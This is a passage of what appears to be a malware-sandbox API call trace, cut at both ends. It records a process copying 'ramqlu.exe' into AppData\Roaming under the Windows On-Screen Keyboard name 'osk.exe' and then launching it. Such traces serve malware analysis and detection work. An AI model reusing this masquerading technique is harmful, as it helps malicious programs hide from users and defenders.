_MaxCount=0x7) returned -12 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0058.256] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp 
(_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.257] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.257] GetProcessHeap () returned 0x4a0000 [0058.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a1298 | out: hHeap=0x4a0000) returned 1 [0058.257] GetProcessHeap () returned 0x4a0000 [0058.257] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x18) returned 0x4a1298 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp 
(_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.258] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", 
_String2="PUBLIC=", _MaxCount=0x7) returned -13 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.259] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0058.259] GetProcessHeap () returned 0x4a0000 [0058.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4a1298 | out: hHeap=0x4a0000) returned 1 [0058.259] GetProcessHeap () returned 0x4a0000 [0058.259] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x1c4) returned 0x4b32d8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlReAllocateHeap (Heap=0x4a0000, Flags=0x0, Ptr=0x4b32d8, Size=0xe8) returned 0x4b32d8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b32d8) returned 0xe8 [0058.260] _wcsnicmp (_String1="/y", _String2="/Y", _MaxCount=0x2) returned 0 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b33c8 [0058.260] GetProcessHeap () returned 0x4a0000 [0058.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b3400 [0058.260] _wcsicmp (_String1="ramqlu.exe", _String2=".") returned 68 [0058.260] _wcsicmp (_String1="ramqlu.exe", 
_String2="..") returned 68 [0058.260] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe")) returned 0x20 [0058.261] GetProcessHeap () returned 0x4a0000 [0058.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x2c) returned 0x4b3660 [0058.261] GetProcessHeap () returned 0x4a0000 [0058.261] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b41f0 [0058.261] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0058.261] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 [0058.261] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff870, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x3ff870, ReturnLength=0x0) returned 0x0 [0058.261] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff878, ProcessInformationLength=0x4) returned 0x0 [0058.261] VirtualAlloc (lpAddress=0x0, dwSize=0xfe00, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0058.261] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", fInfoLevelId=0x1, lpFindFileData=0x4b3408, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4b3408) returned 0x4b3698 [0058.262] GetProcessHeap () returned 0x4a0000 [0058.262] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x14) returned 0x4a1298 [0058.262] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x3feb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0058.262] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="con") returned -53 [0058.262] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3fed7c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x78 [0058.262] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0058.262] _get_osfhandle (_FileHandle=3) returned 0x78 [0058.262] GetFileType (hFile=0x78) returned 0x1 [0058.262] SetErrorMode (uMode=0x0) returned 0x0 [0058.262] SetErrorMode (uMode=0x1) returned 0x0 [0058.263] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", nBufferLength=0x208, lpBuffer=0x3ff030, lpFilePart=0x3fedb4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", lpFilePart=0x3fedb4*="ramqlu.exe") returned 0x30 [0058.263] SetErrorMode (uMode=0x0) returned 0x1 [0058.263] _get_osfhandle (_FileHandle=3) returned 0x78 [0058.263] ReadFile (in: hFile=0x78, lpBuffer=0x110000, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x3fee20, lpOverlapped=0x0 | out: lpBuffer=0x110000*, lpNumberOfBytesRead=0x3fee20*=0x200, lpOverlapped=0x0) returned 1 [0058.264] SetErrorMode (uMode=0x0) returned 0x0 [0058.264] SetErrorMode (uMode=0x1) returned 0x0 [0058.264] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x3fe990, lpFilePart=0x3fe988 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x3fe988*="osk.exe") returned 0x35 [0058.264] SetErrorMode (uMode=0x0) returned 0x1 [0058.264] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0058.264] GetProcessHeap () returned 0x4a0000 [0058.264] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x8, Size=0x258) returned 0x4b4450 [0058.264] _wcsicmp (_String1="osk.exe", _String2=".") returned 65 [0058.264] _wcsicmp (_String1="osk.exe", _String2="..") returned 65 
[0058.264] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0058.265] GetLastError () returned 0x2 [0058.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x104, lpBuffer=0x3feb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x0) returned 0x35 [0058.265] SetErrorMode (uMode=0x0) returned 0x0 [0058.265] SetErrorMode (uMode=0x1) returned 0x0 [0058.265] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", nBufferLength=0x208, lpBuffer=0x3fe990, lpFilePart=0x3fe988 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpFilePart=0x3fe988*="osk.exe") returned 0x35 [0058.265] SetErrorMode (uMode=0x0) returned 0x1 [0058.265] _wcsicmp (_String1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe", _String2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 3 [0058.265] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0xffffffff [0058.265] CopyFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ramqlu.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ramqlu.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x4a7541b4, dwCopyFlags=0x0) returned 1 [0058.289] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x2020 [0058.289] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", dwFileAttributes=0x2020) returned 1 [0058.290] _close (_FileHandle=3) returned 0 [0058.290] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0058.290] GetFileType (hFile=0xffffffff) returned 0x0 [0058.290] _get_osfhandle (_FileHandle=-1) returned 0xffffffff [0058.290] SetFileTime (hFile=0xffffffff, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x3fedc4) returned 0 [0058.290] FindNextFileW (in: hFindFile=0x4b3698, lpFindFileData=0x4b3408 | out: lpFindFileData=0x4b3408*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd10f3e80, ftCreationTime.dwHighDateTime=0x1d61645, ftLastAccessTime.dwLowDateTime=0xd10f3e80, ftLastAccessTime.dwHighDateTime=0x1d61645, ftLastWriteTime.dwLowDateTime=0x209e3c00, ftLastWriteTime.dwHighDateTime=0x1d6163f, nFileSizeHigh=0x0, nFileSizeLow=0x39e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ramqlu.exe", cAlternateFileName="")) returned 0 [0058.290] GetLastError () returned 0x12 [0058.290] FindClose (in: hFindFile=0x4b3698 | out: hFindFile=0x4b3698) returned 1 [0058.290] NtSetInformationProcess (ProcessHandle=0xffffffff, ProcessInformationClass=0x27, ProcessInformation=0x3ff870, ProcessInformationLength=0x4) returned 0x0 [0058.290] _vsnwprintf (in: _Buffer=0x4a755040, _BufferCount=0x103, _Format="%9d", _ArgList=0x3ff84c | out: _Buffer=" 1") returned 9 [0058.290] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.290] GetFileType (hFile=0x7) returned 0x2 [0058.291] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0058.291] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ff7d8 | out: lpMode=0x3ff7d8) returned 1 [0058.291] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.291] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x3ff80c | out: lpConsoleScreenBufferInfo=0x3ff80c) returned 1 [0058.291] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a764640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 
file(s) copied.\r\n") returned 0x14 [0058.292] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2336, dwLanguageId=0x0, lpBuffer=0x4a764640, nSize=0x2000, Arguments=0x3ff84c | out: lpBuffer=" 1 file(s) copied.\r\n") returned 0x1b [0058.292] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a764640*, nNumberOfCharsToWrite=0x1b, lpNumberOfCharsWritten=0x3ff830, lpReserved=0x0 | out: lpBuffer=0x4a764640*, lpNumberOfCharsWritten=0x3ff830*=0x1b) returned 1 [0058.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.293] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0058.293] _get_osfhandle (_FileHandle=1) returned 0x7 [0058.293] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7541ac | out: lpMode=0x4a7541ac) returned 1 [0058.293] _get_osfhandle (_FileHandle=0) returned 0x3 [0058.293] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7541b0 | out: lpMode=0x4a7541b0) returned 1 [0058.294] SetConsoleInputExeNameW () returned 0x1 [0058.294] GetConsoleOutputCP () returned 0x1b5 [0058.294] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a754260 | out: lpCPInfo=0x4a754260) returned 1 [0058.294] SetThreadUILanguage (LangId=0x0) returned 0x409 [0058.294] exit (_Code=0) Process: id = "5" image_name = "osk.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe" page_root = "0x47ed8000" os_pid = "0x620" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x7c4" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 11 os_tid = 0x5c4 [0060.135] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0060.136] GetKeyboardType (nTypeFlag=0) returned 4 [0060.136] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe\" " [0060.136] GetStartupInfoA (in: lpStartupInfo=0x18fef8 | out: lpStartupInfo=0x18fef8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0060.136] GetACP () returned 0x4e4 [0060.136] GetCurrentThreadId () returned 0x5c4 [0060.137] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x18ede8, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.186] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ecc3, nSize=0x105 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe")) returned 0x35 [0060.186] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.186] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.186] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x18edd8 | out: phkResult=0x18edd8*=0x0) returned 0x2 [0060.187] lstrcpynA (in: lpString1=0x18ecc3, 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", iMaxLength=261 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" [0060.187] GetThreadLocale () returned 0x409 [0060.187] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x18edd3, cchData=5 | out: lpLCData="ENU") returned 4 [0060.188] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0060.189] lstrcpynA (in: lpString1=0x18ecf5, lpString2="ENU", iMaxLength=211 | out: lpString1="ENU") returned="ENU" [0060.189] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.ENU", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.189] lstrcpynA (in: lpString1=0x18ecf5, lpString2="EN", iMaxLength=211 | out: lpString1="EN") returned="EN" [0060.189] LoadLibraryExA (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.EN", hFile=0x0, dwFlags=0x2) returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffc1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffda, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffee, 
lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.189] LoadStringA (in: hInstance=0x400000, uID=0xffe9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x18ef18, cchBufferMax=4096 | out: 
lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.190] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x18ef18, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.191] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x1d70000 [0060.191] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.191] LoadStringA (in: hInstance=0x400000, uID=0xffe3, lpBuffer=0x18ef04, cchBufferMax=4096 | out: lpBuffer="") returned 0x0 [0060.192] GetVersionExA (in: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x4, dwMinorVersion=0x140000, dwBuildNumber=0x18fec4, dwPlatformId=0x76c1e37d, szCSDVersion="ÿÿÿÿ") | out: lpVersionInformation=0x18fe9c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0060.192] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0060.192] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceExA") returned 0x76dc434f [0060.192] GetThreadLocale () returned 0x409 [0060.192] GetSystemMetrics (nIndex=42) returned 0 [0060.201] GetThreadLocale () returned 0x409 [0060.201] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x18fd74, cchData=256 | out: 
